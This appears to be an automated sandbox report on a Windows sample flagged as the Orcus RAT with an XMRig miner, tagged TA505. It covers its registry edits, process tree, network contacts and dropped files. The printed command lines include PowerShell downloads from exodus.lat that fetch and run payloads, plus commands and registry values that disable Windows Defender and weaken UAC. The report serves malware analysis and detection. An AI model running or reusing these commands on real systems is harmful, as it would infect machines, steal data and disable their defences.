Malware Analysis Report

2025-01-22 15:02

Sample ID 241208-vhhlvazkds
Target 5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c
SHA256 5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c
Tags
orcus defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer trojan ta505 xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c

Threat Level: Known bad

The file 5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c was found to be: Known bad.

Malicious Activity Summary

orcus defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer trojan ta505 xmrig miner

xmrig

Ta505 family

Orcus

UAC bypass

Modifies Windows Defender Real-time Protection settings

Orcurs Rat Executable

TA505

Xmrig family

XMRig Miner payload

Orcus main payload

Contains code to disable Windows Defender

Orcus family

Orcurs Rat Executable

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Windows security modification

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Hijack Execution Flow: Executable Installer File Permissions Weakness

Adds Run key to start application

Checks whether UAC is enabled

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

System policy modification

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-08 16:59

Signatures

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Orcus family

orcus

Orcus main payload

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-08 16:59

Reported

2024-12-08 17:01

Platform

win7-20240903-en

Max time kernel

118s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Hijack Execution Flow: Executable Installer File Permissions Weakness

defense_evasion persistence privilege_escalation
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2112 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2732 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2732 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2732 wrote to memory of 1324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1324 wrote to memory of 2044 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1324 wrote to memory of 2044 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1324 wrote to memory of 2044 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1324 wrote to memory of 2044 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2732 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
PID 2112 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
PID 2112 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
PID 2112 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
PID 1940 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2732 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

"C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

Network

Country Destination Domain Proto
GB 45.74.38.211:4782 tcp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp

Files

memory/2112-0-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/2112-1-0x00000000013C0000-0x00000000017C6000-memory.dmp

memory/2112-2-0x0000000000370000-0x000000000037E000-memory.dmp

memory/2112-3-0x00000000742A0000-0x000000007498E000-memory.dmp

memory/2112-4-0x00000000006F0000-0x000000000074C000-memory.dmp

memory/2112-5-0x0000000000480000-0x0000000000492000-memory.dmp

memory/2112-6-0x0000000000650000-0x0000000000658000-memory.dmp

memory/2112-7-0x00000000006A0000-0x00000000006A8000-memory.dmp

memory/2112-8-0x00000000006B0000-0x00000000006BA000-memory.dmp

memory/2112-9-0x00000000006C0000-0x00000000006C8000-memory.dmp

memory/2112-10-0x00000000009D0000-0x00000000009E8000-memory.dmp

memory/2112-11-0x0000000000D40000-0x0000000000D50000-memory.dmp

memory/2132-15-0x000000006D631000-0x000000006D632000-memory.dmp

memory/2132-16-0x000000006D630000-0x000000006DBDB000-memory.dmp

memory/2132-17-0x000000006D630000-0x000000006DBDB000-memory.dmp

memory/2132-18-0x000000006D630000-0x000000006DBDB000-memory.dmp

memory/2132-19-0x000000006D630000-0x000000006DBDB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC1EA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2132-36-0x000000006D630000-0x000000006DBDB000-memory.dmp

memory/2112-37-0x00000000742AE000-0x00000000742AF000-memory.dmp

memory/2112-38-0x00000000742A0000-0x000000007498E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 090c785c1bd8e108eeec7dfcca8805d8
SHA1 7cc721ff796a216e26aadf314c243b911241ad50
SHA256 871628a642ccdf4497044f67868fa89a1c525cea0c1655e14fa4a78d8b3153b5
SHA512 c2e14980ede61999cf3dff4d3b555b39be3ca8e34412ffd0e69628a1dc3fc7bb12bfe82b4022caedca153f49bcb81fae13e37a89b5739fef02efbfe2ea8b6915

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/296-82-0x0000000001260000-0x000000000128E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-08 16:59

Reported

2024-12-08 17:01

Platform

win10v2004-20241007-en

Max time kernel

98s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Orcus

rat spyware stealer orcus

Orcus family

orcus

TA505

ta505

Ta505 family

ta505

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

xmrig

miner xmrig

Orcurs Rat Executable

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
